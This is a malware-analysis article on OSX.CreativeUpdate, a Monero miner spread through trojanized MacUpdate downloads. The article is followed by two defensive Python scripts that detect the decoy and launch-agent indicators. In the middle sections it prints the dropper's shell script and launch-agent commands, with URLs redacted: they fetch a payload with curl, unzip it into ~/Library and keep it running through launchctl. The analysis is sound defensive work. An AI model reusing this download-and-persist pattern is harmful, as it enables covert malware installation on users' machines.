Early this morning, security researcher Arnaud Abbati of SentinelOne tweeted about new Mac malware being distributed via MacUpdate. This malware, which Abbati has named OSX.CreativeUpdate, is a new cryptocurrency miner, designed to sit in the background and use your computer's CPU to mine the Monero currency.

The malware was spread via a hack of the MacUpdate site, which was distributing maliciously modified copies of the Firefox, OnyX, and Deeper applications. According to a statement posted in the comments for each of the affected apps on the MacUpdate website, this happened sometime on February 1.

Both OnyX and Deeper are products made by Titanium Software, but the site was changed maliciously to point to download URLs at a different domain, one first registered on January 23 and whose ownership is obscured. The fake Firefox app was distributed from a separate domain of its own. (Notice that the domain ends in something that looks like the legitimate vendor's domain but is definitely not the same. This is a common scammer trick to make you think it's coming from a legitimate site.)

The downloaded files are .dmg (disk image) files, and they look pretty convincing. In each case, the user is asked to drag the app into the Applications folder, just as the original, non-malicious disk image would.

The applications themselves were, as Abbati indicated in his tweet, created by Platypus, a developer tool that makes full macOS applications from a variety of scripts, such as shell or Python scripts. This means the creation of these applications had a low bar for entry.

Once the application has been installed, when the user opens it, it will download and install the payload from a legitimate site owned by Adobe. Then, it attempts to open a copy of the original app (referred to as a decoy app, because it is used to trick the user into thinking nothing's wrong), which is included inside the malicious app.

This does not always work. For example, the malicious OnyX app will run on Mac OS X 10.7 and up, but the decoy OnyX app requires macOS 10.13. This means that on any system between 10.7 and 10.12, the malware will run, but the decoy app won't open to cover up the fact that something malicious is going on. In the case of the Deeper app, the hackers got even sloppier, including an OnyX app instead of a Deeper app as the decoy by mistake, making it fail similarly but for a more laughable reason.

The "script" file inside the app takes care of opening the decoy app, and then downloading and installing the malware. The download URL and the launch agent's file name are omitted below:

```sh
open Deeper.app
# the test below is inferred from the behaviour described next:
# install only when the mdworker folder is not already present
if [ ! -d ~/Library/mdworker ]; then
    curl -o ~/Library/mdworker.zip "<payload URL>?content_disposition=attachment" &&
    unzip -o ~/Library/mdworker.zip -d ~/Library &&
    mkdir -p ~/Library/LaunchAgents &&
    mv ~/Library/mdworker/<updater>.plist ~/Library/LaunchAgents &&
    sleep 300 &&
    launchctl load -w ~/Library/LaunchAgents/<updater>.plist &&
    rm -rf ~/Library/mdworker.zip &&
    killall Deeperd
else
    killall Deeperd
fi
```

For those who can't read shell scripts, this code first attempts to open the decoy Deeper.app, which will fail since the wrong decoy was included by mistake. Next, if the malware is already installed, the malicious dropper process is killed, since installation is not necessary.

If the malware is not installed, the script downloads the malware and unzips it into the user's Library folder, which is hidden in macOS by default, so most users wouldn't even know anything had been added there. It also installs a malicious launch agent .plist file, which recurrently runs another script (again with the URL and file names omitted):

```sh
sh -c "launchctl unload -w ~/Library/LaunchAgents/<worker>.plist && rm -rf ~/Library/LaunchAgents/<worker>.plist && curl -o ~/Library/LaunchAgents/<worker>.plist \"<URL>?content_disposition=attachment\" && launchctl load -w ~/Library/LaunchAgents/<worker>.plist"
```

When this launch agent runs, it downloads a new .plist file and installs it. Before doing so, it removes the previous copy of that .plist file, presumably so it can be updated with new code. The version of this .plist file that we obtained did the real work:

```sh
sh -c "~/Library/mdworker/sysmdworker -user <email address> -xmr"
```

This loads a malicious sysmdworker process, passing in a couple of arguments, one of which is an email address. That sysmdworker process will then do the work of mining the Monero cryptocurrency, using a command-line tool called minergate-cli, and periodically connecting to the mining service, passing in the above email address as the login.

There are several takeaways from this. First and foremost, never download software from any kind of "download aggregation" site (a site that acts like an unofficial Mac App Store to let you browse for software). Such sites have a long history of issues. In the case of MacUpdate, back in 2015 they were modifying other people's software, wrapping it in their own adware-laden installer. This is no longer happening, but in 2016, MacUpdate was similarly used to distribute the OSX.Eleanor malware.

Instead, always download software directly from the developer's site or from the Mac App Store. These are not guarantees, and can still get you infected with malware, adware, or scam software.
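The decoy failure described above (an OnyX decoy that needs macOS 10.13 inside an app that runs from 10.7 up, and an OnyX app shipped as the decoy for Deeper) is the kind of thing an analyst can check mechanically when triaging a Platypus-built app. The following is an added example, not code from this write-up or from Malwarebytes. It assumes the decoy is a nested .app under Contents/Resources, which is where Platypus places bundled files, and it builds its own sample bundles in a temporary directory rather than reading real ones.

```python
"""Triage check for a Platypus-style trojanized app that carries a decoy app.

Added example; not code from the write-up. It compares the outer bundle's
LSMinimumSystemVersion and CFBundleName with those of every .app nested under
Contents/Resources (assumed decoy location) and reports where the cover story
breaks. Sample bundles are constructed in a temp directory.
"""
import plistlib
import tempfile
from pathlib import Path


def _version_tuple(v):
    """'10.13' -> (10, 13) so that versions compare numerically, not as strings."""
    return tuple(int(p) for p in v.split("."))


def _read_info(app_dir):
    with open(Path(app_dir) / "Contents" / "Info.plist", "rb") as f:
        return plistlib.load(f)


def find_embedded_apps(app_dir):
    """Return every .app bundle nested anywhere under Contents/Resources."""
    res = Path(app_dir) / "Contents" / "Resources"
    return sorted(p for p in res.rglob("*.app") if p.is_dir())


def check_decoy(app_dir):
    """Return a list of findings about the decoy(s) inside app_dir.

    A decoy that requires a newer macOS than the outer app means the malware
    runs but nothing opens on the older systems; a decoy whose bundle name
    differs from the outer app is simply the wrong decoy (the Deeper case).
    """
    outer = _read_info(app_dir)
    outer_min = outer.get("LSMinimumSystemVersion", "10.0")
    outer_name = outer.get("CFBundleName", Path(app_dir).stem)
    findings = []
    decoys = find_embedded_apps(app_dir)
    if not decoys:
        findings.append("no embedded .app found under Contents/Resources")
    for decoy in decoys:
        info = _read_info(decoy)
        d_min = info.get("LSMinimumSystemVersion", "10.0")
        d_name = info.get("CFBundleName", decoy.stem)
        if _version_tuple(d_min) > _version_tuple(outer_min):
            findings.append(
                f"decoy {decoy.name} requires macOS {d_min} but the outer app runs on "
                f"{outer_min} and up; the decoy will not open on anything older than {d_min}"
            )
        if d_name != outer_name:
            findings.append(
                f"decoy {decoy.name} is '{d_name}' but the outer app is '{outer_name}': wrong decoy bundled"
            )
    return findings


def build_sample_bundle(root, outer_name, outer_min, decoy_name, decoy_min):
    """Constructed sample: a minimal Platypus-like bundle with a decoy inside."""
    app = Path(root) / f"{outer_name}.app"
    decoy = app / "Contents" / "Resources" / f"{decoy_name}.app"
    for bundle, name, minver in ((app, outer_name, outer_min), (decoy, decoy_name, decoy_min)):
        (bundle / "Contents").mkdir(parents=True, exist_ok=True)
        with open(bundle / "Contents" / "Info.plist", "wb") as f:
            plistlib.dump({"CFBundleName": name, "LSMinimumSystemVersion": minver}, f)
    # Platypus keeps the wrapped script at Contents/Resources/script.
    (app / "Contents" / "Resources" / "script").write_text(f"#!/bin/sh\nopen {decoy_name}.app\n")
    return app


def demo():
    """Model the two cases from the write-up; returns (onyx_findings, deeper_findings)."""
    with tempfile.TemporaryDirectory() as tmp:
        onyx = build_sample_bundle(tmp, "OnyX", "10.7", "OnyX", "10.13")
        deeper = build_sample_bundle(tmp, "Deeper", "10.7", "OnyX", "10.13")
        return check_decoy(onyx), check_decoy(deeper)


if __name__ == "__main__":
    for findings in demo():
        print("\n".join(findings) or "no decoy problems")
```

Against a real sample, call check_decoy on the mounted disk image's .app; the version gap it reports is exactly the range of systems on which a victim would see the malware run with no app window to explain it.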
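For anyone who wants to check a Mac for the persistence pattern described above, the following is an added example (not code from this write-up or from Malwarebytes) that parses every .plist in a LaunchAgents folder and flags the two behaviours the post describes: an agent whose whole job is a curl-then-launchctl-load pipeline wrapped in sh -c, and an agent that starts sysmdworker with -xmr. The sample plists, their file names, the URL and the email address are constructed for the example; on a real system point scan_launch_agents at ~/Library/LaunchAgents.

```python
"""Hunt a LaunchAgents folder for the self-updating agent and the miner agent.

Added example; not code from the write-up. Indicators are taken from the
behaviour described there (curl + launchctl load in one sh -c string,
sysmdworker / minergate / -xmr, the ~/Library/mdworker folder). Sample plists
are constructed inline; the URL and email in them are placeholders.
"""
import os
import plistlib
import re
import tempfile
from pathlib import Path

MINER_TERMS = ("sysmdworker", "minergate", "-xmr", "~/Library/mdworker", "/Library/mdworker/")
SELF_UPDATE = re.compile(r"curl\b.*launchctl\s+load", re.S)
SHELL_WRAPPER = re.compile(r"^(?:sh|bash|zsh)$")


def command_line(plist):
    """Flatten ProgramArguments (or Program) into one string for matching."""
    args = plist.get("ProgramArguments") or ([plist["Program"]] if "Program" in plist else [])
    return " ".join(str(a) for a in args)


def classify(plist):
    """Return the list of tags that apply to one launch agent dict."""
    cmd = command_line(plist)
    args = plist.get("ProgramArguments") or []
    tags = []
    # `sh -c "<pipeline>"`: the real payload is hidden inside a single argument.
    if len(args) >= 3 and SHELL_WRAPPER.match(os.path.basename(str(args[0]))) and args[1] == "-c":
        tags.append("shell-wrapper")
    if SELF_UPDATE.search(cmd):
        tags.append("downloads-and-reloads-launch-agent")
    if any(term in cmd for term in MINER_TERMS):
        tags.append("miner-indicator")
    # RunAtLoad plus StartInterval is what makes the updater run recurrently.
    if plist.get("RunAtLoad") and plist.get("StartInterval"):
        tags.append("recurring")
    return tags


def scan_launch_agents(directory):
    """Map each flagged .plist file name to its tags; unparseable files are flagged too."""
    results = {}
    for path in sorted(Path(directory).glob("*.plist")):
        try:
            with open(path, "rb") as f:
                plist = plistlib.load(f)
        except Exception as exc:  # a malformed plist in LaunchAgents is itself worth a look
            results[path.name] = [f"unparseable:{type(exc).__name__}"]
            continue
        tags = classify(plist)
        if tags:
            results[path.name] = tags
    return results


# Constructed samples: one benign agent and two modelled on the described behaviour.
SAMPLES = {
    "com.example.backup.plist": {
        "Label": "com.example.backup",
        "ProgramArguments": ["/usr/local/bin/backup", "--quiet"],
        "StartInterval": 3600,
    },
    "updater.plist": {
        "Label": "updater",
        "ProgramArguments": ["sh", "-c",
            "launchctl unload -w ~/Library/LaunchAgents/agent.plist && "
            "rm -rf ~/Library/LaunchAgents/agent.plist && "
            "curl -o ~/Library/LaunchAgents/agent.plist "
            "'https://example.invalid/file?content_disposition=attachment' && "
            "launchctl load -w ~/Library/LaunchAgents/agent.plist"],
        "RunAtLoad": True,
        "StartInterval": 300,
    },
    "agent.plist": {
        "Label": "agent",
        "ProgramArguments": ["sh", "-c",
            "~/Library/mdworker/sysmdworker -user user@example.invalid -xmr"],
        "RunAtLoad": True,
    },
}


def demo():
    """Write the samples to a temp folder and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, plist in SAMPLES.items():
            with open(Path(tmp, name), "wb") as f:
                plistlib.dump(plist, f)
        return scan_launch_agents(tmp)


if __name__ == "__main__":
    for name, tags in demo().items():
        print(f"{name}: {', '.join(tags)}")
```

A sh -c wrapper on its own is common in legitimate agents, which is why it is reported as a tag rather than a verdict; the combination of the wrapper with a download-and-reload pipeline, or with the mdworker path, is what should prompt a closer look and a check for a running sysmdworker or minergate-cli process.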